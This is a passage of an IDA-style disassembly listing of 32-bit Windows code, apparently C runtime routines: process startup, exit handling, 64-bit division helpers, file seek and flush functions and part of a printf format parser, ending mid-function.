sub_415D8B proc near ; CODE XREF: .text:loc_416255�p
mov eax, off_42D7A8
test eax, eax
jz short loc_415D96
call eax ; sub_414D2D
loc_415D96: ; CODE XREF: sub_415D8B+7�j
push esi
push edi
mov ecx, offset dword_42B00C
mov edi, offset dword_42B020
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_415DC1
loc_415DAA: ; CODE XREF: sub_415D8B+30�j
test eax, eax
jnz short loc_415DED
mov ecx, [esi]
test ecx, ecx
jz short loc_415DB6
call ecx
loc_415DB6: ; CODE XREF: sub_415D8B+27�j
add esi, 4
cmp esi, edi
jb short loc_415DAA
test eax, eax
jnz short loc_415DED
loc_415DC1: ; CODE XREF: sub_415D8B+1D�j
push offset sub_41B134
call sub_41B0DE
mov esi, offset dword_42B000
mov eax, esi
mov edi, offset dword_42B008
cmp eax, edi
pop ecx
jnb short loc_415DEB
loc_415DDC: ; CODE XREF: sub_415D8B+5E�j
mov eax, [esi]
test eax, eax
jz short loc_415DE4
call eax
loc_415DE4: ; CODE XREF: sub_415D8B+55�j
add esi, 4
cmp esi, edi
jb short loc_415DDC
loc_415DEB: ; CODE XREF: sub_415D8B+4F�j
xor eax, eax
loc_415DED: ; CODE XREF: sub_415D8B+21�j
; sub_415D8B+34�j
pop edi
pop esi
retn
sub_415D8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DF0 proc near ; CODE XREF: sub_415EC3+8�p
; sub_415ED4+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_4180B5
xor esi, esi
inc esi
cmp dword_47C204, esi
pop ecx
jnz short loc_415E18
push [ebp+arg_0]
call ds:dword_4200E0 ; GetCurrentProcess
push eax
call ds:dword_4200E8 ; TerminateProcess
loc_415E18: ; CODE XREF: sub_415DF0+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_47C200, esi
mov byte_47C1FC, al
jnz short loc_415E7E
mov ecx, dword_47D9D0
test ecx, ecx
jz short loc_415E5F
mov eax, dword_47D9CC
sub eax, 4
cmp eax, ecx
jmp short loc_415E58
; ---------------------------------------------------------------------------
loc_415E42: ; CODE XREF: sub_415DF0+6D�j
mov eax, [eax]
test eax, eax
jz short loc_415E4A
call eax
loc_415E4A: ; CODE XREF: sub_415DF0+56�j
mov eax, dword_47D9CC
sub eax, 4
cmp eax, dword_47D9D0
loc_415E58: ; CODE XREF: sub_415DF0+50�j
mov dword_47D9CC, eax
jnb short loc_415E42
loc_415E5F: ; CODE XREF: sub_415DF0+44�j
mov eax, offset dword_42B024
mov esi, offset dword_42B02C
cmp eax, esi
mov edi, eax
jnb short loc_415E7E
loc_415E6F: ; CODE XREF: sub_415DF0+8C�j
mov eax, [edi]
test eax, eax
jz short loc_415E77
call eax
loc_415E77: ; CODE XREF: sub_415DF0+83�j
add edi, 4
cmp edi, esi
jb short loc_415E6F
loc_415E7E: ; CODE XREF: sub_415DF0+3A�j
; sub_415DF0+7D�j
mov eax, offset dword_42B030
mov esi, offset dword_42B038
cmp eax, esi
mov edi, eax
jnb short loc_415E9D
loc_415E8E: ; CODE XREF: sub_415DF0+AB�j
mov eax, [edi]
test eax, eax
jz short loc_415E96
call eax
loc_415E96: ; CODE XREF: sub_415DF0+A2�j
add edi, 4
cmp edi, esi
jb short loc_415E8E
loc_415E9D: ; CODE XREF: sub_415DF0+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_415EAE
push 8
call sub_418021
jmp short loc_415EC0
; ---------------------------------------------------------------------------
loc_415EAE: ; CODE XREF: sub_415DF0+B3�j
push [ebp+arg_0]
mov dword_47C204, 1
call sub_415D49
loc_415EC0: ; CODE XREF: sub_415DF0+BC�j
pop ecx
pop ebp
retn
sub_415DF0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415EC3 proc near ; CODE XREF: .text:004162A5�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_415DF0
add esp, 0Ch
retn
sub_415EC3 endp
; =============== S U B R O U T I N E =======================================
sub_415ED4 proc near ; CODE XREF: sub_4160D0+1C�p
; .text:004162D2�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_415DF0
add esp, 0Ch
retn
sub_415ED4 endp
; =============== S U B R O U T I N E =======================================
sub_415EE5 proc near ; CODE XREF: .text:loc_4162AA�p
push 1
push 0
push 0
call sub_415DF0
add esp, 0Ch
retn
sub_415EE5 endp
; =============== S U B R O U T I N E =======================================
sub_415EF4 proc near ; CODE XREF: .text:loc_4162D7�p
push 1
push 1
push 0
call sub_415DF0
add esp, 0Ch
retn
sub_415EF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415F10 proc near ; CODE XREF: sub_41161C+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_415F31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_415F81
; ---------------------------------------------------------------------------
loc_415F31: ; CODE XREF: sub_415F10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_415F3F: ; CODE XREF: sub_415F10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_415F3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_415F6A
cmp edx, [esp+4+arg_4]
ja short loc_415F6A
jb short loc_415F72
cmp eax, [esp+4+arg_0]
jbe short loc_415F72
loc_415F6A: ; CODE XREF: sub_415F10+4A�j
; sub_415F10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_415F72: ; CODE XREF: sub_415F10+52�j
; sub_415F10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_415F81: ; CODE XREF: sub_415F10+1F�j
pop ebx
retn 10h
sub_415F10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415F90 proc near ; CODE XREF: sub_41161C+24�p
; sub_415250+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_415FB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_415FF3
; ---------------------------------------------------------------------------
loc_415FB2: ; CODE XREF: sub_415F90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_415FC0: ; CODE XREF: sub_415F90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_415FC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_415FEE
cmp edx, [esp+8+arg_4]
ja short loc_415FEE
jb short loc_415FEF
cmp eax, [esp+8+arg_0]
jbe short loc_415FEF
loc_415FEE: ; CODE XREF: sub_415F90+4E�j
; sub_415F90+54�j
dec esi
loc_415FEF: ; CODE XREF: sub_415F90+56�j
; sub_415F90+5C�j
xor edx, edx
mov eax, esi
loc_415FF3: ; CODE XREF: sub_415F90+20�j
pop esi
pop ebx
retn 10h
sub_415F90 endp
; =============== S U B R O U T I N E =======================================
sub_415FF8 proc near ; CODE XREF: sub_416087+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_416076
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_416017
cmp edi, 1
jz short loc_416017
cmp edi, 2
jnz short loc_416076
loc_416017: ; CODE XREF: sub_415FF8+13�j
; sub_415FF8+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_41602F
push esi
call sub_41B297
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_41602F: ; CODE XREF: sub_415FF8+28�j
push esi
call sub_417C02
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_416045
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_416059
; ---------------------------------------------------------------------------
loc_416045: ; CODE XREF: sub_415FF8+43�j
test al, 1
jz short loc_416059
test al, 8
jz short loc_416059
test ah, 4
jnz short loc_416059
mov dword ptr [esi+18h], 200h
loc_416059: ; CODE XREF: sub_415FF8+4B�j
; sub_415FF8+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41B1EC
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_416084
; ---------------------------------------------------------------------------
loc_416076: ; CODE XREF: sub_415FF8+B�j
; sub_415FF8+1D�j
call sub_419430
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_416084: ; CODE XREF: sub_415FF8+7C�j
pop edi
pop esi
retn
sub_415FF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416087 proc near ; CODE XREF: sub_411DD2+2C6�p
; sub_411DD2+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_428DB0
call __SEH_prolog
push [ebp+arg_0]
call sub_417E28
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_415FF8
add esp, 0Ch
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4160C6
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_416087 endp
; =============== S U B R O U T I N E =======================================
sub_4160C6 proc near ; CODE XREF: sub_416087+31�p
; DATA XREF: .rdata:stru_428DB0�o
push dword ptr [ebp+8]
call sub_417E7A
pop ecx
retn
sub_4160C6 endp
; =============== S U B R O U T I N E =======================================
sub_4160D0 proc near ; CODE XREF: .text:00416218�p
; .text:0041623E�p ...
arg_0 = dword ptr 4
cmp dword_47C210, 1
jnz short loc_4160DE
call sub_41B570
loc_4160DE: ; CODE XREF: sub_4160D0+7�j
push [esp+arg_0]
call sub_41B3F9
push 0FFh
call off_42D7D0
pop ecx
pop ecx
retn
sub_4160D0 endp
; =============== S U B R O U T I N E =======================================
sub_4160F5 proc near ; CODE XREF: .text:004161EE�p
; .text:004161FF�p
arg_0 = dword ptr 4
cmp dword_47C210, 1
jnz short loc_416103
call sub_41B570
loc_416103: ; CODE XREF: sub_4160F5+7�j
push [esp+arg_0]
call sub_41B3F9
push 0FFh
call sub_415D49
pop ecx
pop ecx
retn
sub_4160F5 endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_428DC0
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_414630
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_420120 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_47C1C4, ecx
mov eax, [esi+4]
mov dword_47C1D0, eax
mov edx, [esi+8]
mov dword_47C1D4, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_47C1C8, esi
cmp ecx, 2
jz short loc_416179
or esi, 8000h
mov dword_47C1C8, esi
loc_416179: ; CODE XREF: .text:0041616B�j
shl eax, 8
add eax, edx
mov dword_47C1CC, eax
xor esi, esi
push esi
mov edi, ds:dword_4200A4
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_4161B4
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_4161B4
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_4161CC
cmp eax, 20Bh
jz short loc_4161B9
loc_4161B4: ; CODE XREF: .text:00416193�j
; .text:004161A0�j ...
mov [ebp-1Ch], esi
jmp short loc_4161E0
; ---------------------------------------------------------------------------
loc_4161B9: ; CODE XREF: .text:004161B2�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_4161B4
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_4161DA
; ---------------------------------------------------------------------------
loc_4161CC: ; CODE XREF: .text:004161AB�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_4161B4
xor eax, eax
cmp [ecx+0E8h], esi
loc_4161DA: ; CODE XREF: .text:004161CA�j
setnz al
mov [ebp-1Ch], eax
loc_4161E0: ; CODE XREF: .text:004161B7�j
push 1
call sub_417F32
pop ecx
test eax, eax
jnz short loc_4161F4
push 1Ch
call sub_4160F5
pop ecx
loc_4161F4: ; CODE XREF: .text:004161EA�j
call sub_416CB6
test eax, eax
jnz short loc_416205
push 10h
call sub_4160F5
pop ecx
loc_416205: ; CODE XREF: .text:004161FB�j
call sub_41B0F0
mov [ebp-4], esi
call sub_41BB6D
test eax, eax
jge short loc_41621E
push 1Bh
call sub_4160D0
pop ecx
loc_41621E: ; CODE XREF: .text:00416214�j
call ds:dword_420168 ; GetCommandLineA
mov dword_47D9C4, eax
call sub_41BA4B
mov dword_47C208, eax
call sub_41B9A9
test eax, eax
jge short loc_416244
push 8
call sub_4160D0
pop ecx
loc_416244: ; CODE XREF: .text:0041623A�j
call sub_41B776
test eax, eax
jge short loc_416255
push 9
call sub_4160D0
pop ecx
loc_416255: ; CODE XREF: .text:0041624B�j
call sub_415D8B
mov [ebp-20h], eax
cmp eax, esi
jz short loc_416268
push eax
call sub_4160D0
pop ecx
loc_416268: ; CODE XREF: .text:0041625F�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call ds:dword_420164 ; GetStartupInfoA
call sub_41B70D
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_416289
movzx eax, word ptr [ebp-34h]
jmp short loc_41628C
; ---------------------------------------------------------------------------
loc_416289: ; CODE XREF: .text:00416281�j
push 0Ah
pop eax
loc_41628C: ; CODE XREF: .text:00416287�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40E6BB
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_4162AA
push edi
call sub_415EC3
loc_4162AA: ; CODE XREF: .text:004162A2�j
call sub_415EE5
jmp short loc_4162DC
; ---------------------------------------------------------------------------
loc_4162B1: ; DATA XREF: .rdata:stru_428DC0�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_41B5A9
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4162C5: ; DATA XREF: .rdata:stru_428DC0�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_4162D7
push edi
call sub_415ED4
loc_4162D7: ; CODE XREF: .text:004162CF�j
call sub_415EF4
loc_4162DC: ; CODE XREF: .text:004162AF�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162EB proc near ; CODE XREF: sub_414415+4B�p
; sub_41466D+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_4163F7
test al, 40h
jnz loc_4163F7
test al, 1
jz short loc_416324
and dword ptr [esi+4], 0
test al, 10h
jz loc_4163F7
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_416324: ; CODE XREF: sub_4162EB+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_416360
cmp esi, offset dword_42D9A8
jz short loc_41634E
cmp esi, offset dword_42D9C8
jnz short loc_416359
loc_41634E: ; CODE XREF: sub_4162EB+59�j
push ebx
call sub_41BFFF
test eax, eax
pop ecx
jnz short loc_416360
loc_416359: ; CODE XREF: sub_4162EB+61�j
push esi
call sub_41BFBB
pop ecx
loc_416360: ; CODE XREF: sub_4162EB+51�j
; sub_4162EB+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_4163CD
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41638D
push edi
push eax
push ebx
call sub_41BF10
mov [ebp+arg_4], eax
jmp short loc_4163C0
; ---------------------------------------------------------------------------
loc_41638D: ; CODE XREF: sub_4162EB+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_4163AB
mov ecx, ebx
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_4163B0
; ---------------------------------------------------------------------------
loc_4163AB: ; CODE XREF: sub_4162EB+A5�j
mov eax, offset dword_42E0E0
loc_4163B0: ; CODE XREF: sub_4162EB+BE�j
test byte ptr [eax+4], 20h
jz short loc_4163C3
push 2
push 0
push ebx
call sub_41B1EC
loc_4163C0: ; CODE XREF: sub_4162EB+A0�j
add esp, 0Ch
loc_4163C3: ; CODE XREF: sub_4162EB+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_4163E1
; ---------------------------------------------------------------------------
loc_4163CD: ; CODE XREF: sub_4162EB+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41BF10
add esp, 0Ch
mov [ebp+arg_4], eax
loc_4163E1: ; CODE XREF: sub_4162EB+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_4163ED
or dword ptr [esi+0Ch], 20h
jmp short loc_4163FD
; ---------------------------------------------------------------------------
loc_4163ED: ; CODE XREF: sub_4162EB+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_416400
; ---------------------------------------------------------------------------
loc_4163F7: ; CODE XREF: sub_4162EB+10�j
; sub_4162EB+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_4163FD: ; CODE XREF: sub_4162EB+100�j
or eax, 0FFFFFFFFh
loc_416400: ; CODE XREF: sub_4162EB+10A�j
pop esi
pop ebx
pop ebp
retn
sub_4162EB endp
; =============== S U B R O U T I N E =======================================
sub_416404 proc near ; CODE XREF: sub_416437+11�p
; sub_41645B+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_416410
cmp dword ptr [ecx+8], 0
jz short loc_416434
loc_416410: ; CODE XREF: sub_416404+4�j
dec dword ptr [ecx+4]
js short loc_416420
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41642C
; ---------------------------------------------------------------------------
loc_416420: ; CODE XREF: sub_416404+F�j
movsx eax, al
push ecx
push eax
call sub_4162EB
pop ecx
pop ecx
loc_41642C: ; CODE XREF: sub_416404+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_416434
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_416434: ; CODE XREF: sub_416404+A�j
; sub_416404+2B�j
inc dword ptr [esi]
retn
sub_416404 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416437 proc near ; CODE XREF: sub_416492+6A2�p
; sub_416492+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_416452
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_416437+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_416404
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_416458
loc_416452: ; CODE XREF: sub_416437+6�j
cmp [ebp+arg_4], 0
jg short loc_41643F
loc_416458: ; CODE XREF: sub_416437+19�j
pop esi
pop ebp
retn
sub_416437 endp
; =============== S U B R O U T I N E =======================================
sub_41645B proc near ; CODE XREF: sub_416492+6B6�p
; sub_416492+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_416488
cmp dword ptr [edi+8], 0
jnz short loc_416488
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_41648F
; ---------------------------------------------------------------------------
loc_416475: ; CODE XREF: sub_41645B+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_416404
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41648F
loc_416488: ; CODE XREF: sub_41645B+A�j
; sub_41645B+10�j
cmp [esp+8+arg_0], 0
jg short loc_416475
loc_41648F: ; CODE XREF: sub_41645B+18�j
; sub_41645B+2B�j
pop esi
pop ebx
retn
sub_41645B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416492 proc near ; CODE XREF: sub_414415+2A�p
; sub_41466D+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_416BF6
push esi
push edi
mov edi, eax
jmp short loc_4164CA
; ---------------------------------------------------------------------------
loc_4164C7: ; CODE XREF: sub_416492+75C�j
mov ecx, [ebp+var_38]
loc_4164CA: ; CODE XREF: sub_416492+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_416BF4
cmp bl, 20h
jl short loc_4164F1
cmp bl, 78h
jg short loc_4164F1
movsx eax, bl
movsx eax, byte ptr ds:stru_428DB0._unk[eax]
and eax, 0Fh
jmp short loc_4164F3
; ---------------------------------------------------------------------------
loc_4164F1: ; CODE XREF: sub_416492+49�j
; sub_416492+4E�j
xor eax, eax
loc_4164F3: ; CODE XREF: sub_416492+5D�j
movsx eax, ds:byte_428DD0[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_416BE7 ; default
jmp ds:off_416C07[eax*4] ; switch jump
loc_416513: ; DATA XREF: .text:off_416C07�o
xor eax, eax ; jumptable 0041650C case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416530: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
movsx eax, bl ; jumptable 0041650C case 2
sub eax, 20h
jz short loc_416573
sub eax, 3
jz short loc_41656A
sub eax, 8
jz short loc_416561
dec eax
dec eax
jz short loc_416558
sub eax, 3
jnz loc_416BE7 ; default
or [ebp+var_8], 8
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416558: ; CODE XREF: sub_416492+B2�j
or [ebp+var_8], 4
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416561: ; CODE XREF: sub_416492+AE�j
or [ebp+var_8], 1
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_41656A: ; CODE XREF: sub_416492+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416573: ; CODE XREF: sub_416492+A4�j
or [ebp+var_8], 2
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_41657C: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
cmp bl, 2Ah ; jumptable 0041650C case 3
jnz short loc_4165A2
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_416BE7 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4165A2: ; CODE XREF: sub_416492+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4165B7: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
and [ebp+var_C], 0 ; jumptable 0041650C case 4
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4165C0: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
cmp bl, 2Ah ; jumptable 0041650C case 5
jnz short loc_4165E3
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_416BE7 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4165E3: ; CODE XREF: sub_416492+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4165F8: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
cmp bl, 49h ; jumptable 0041650C case 6
jz short loc_41662B
cmp bl, 68h
jz short loc_416622
cmp bl, 6Ch
jz short loc_416619
cmp bl, 77h
jnz loc_416BE7 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416619: ; CODE XREF: sub_416492+173�j
or [ebp+var_8], 10h
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416622: ; CODE XREF: sub_416492+16E�j
or [ebp+var_8], 20h
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_41662B: ; CODE XREF: sub_416492+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_416645
cmp byte ptr [edi+1], 34h
jnz short loc_416645
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_416645: ; CODE XREF: sub_416492+19D�j
; sub_416492+1A3�j
cmp al, 33h
jnz short loc_41665D
cmp byte ptr [edi+1], 32h
jnz short loc_41665D
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_41665D: ; CODE XREF: sub_416492+1B5�j
; sub_416492+1BB�j
cmp al, 64h
jz loc_416BE7 ; default
cmp al, 69h
jz loc_416BE7 ; default
cmp al, 6Fh
jz loc_416BE7 ; default
cmp al, 75h
jz loc_416BE7 ; default
cmp al, 78h
jz loc_416BE7 ; default
cmp al, 58h
jz loc_416BE7 ; default
and [ebp+var_38], 0
loc_416691: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
mov ecx, off_42DEB0 ; jumptable 0041650C case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4166B8
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_416404
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_4166B8: ; CODE XREF: sub_416492+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_416404
jmp loc_416BE7 ; default
; ---------------------------------------------------------------------------
loc_4166CA: ; CODE XREF: sub_416492+7A�j
; DATA XREF: .text:off_416C07�o
movsx eax, bl ; jumptable 0041650C case 7
cmp eax, 67h
jg loc_41691C
cmp eax, 65h
jge loc_41675F
cmp eax, 58h
jg loc_4167C0
jz loc_41699D
sub eax, 43h
jz loc_416782
dec eax
dec eax
jz short loc_416755
dec eax
dec eax
jz short loc_416755
sub eax, 0Ch
jnz loc_416AE5
test word ptr [ebp+var_8], 830h
jnz short loc_416714
or byte ptr [ebp+var_8+1], 8
loc_416714: ; CODE XREF: sub_416492+27C�j
; sub_416492+4A9�j
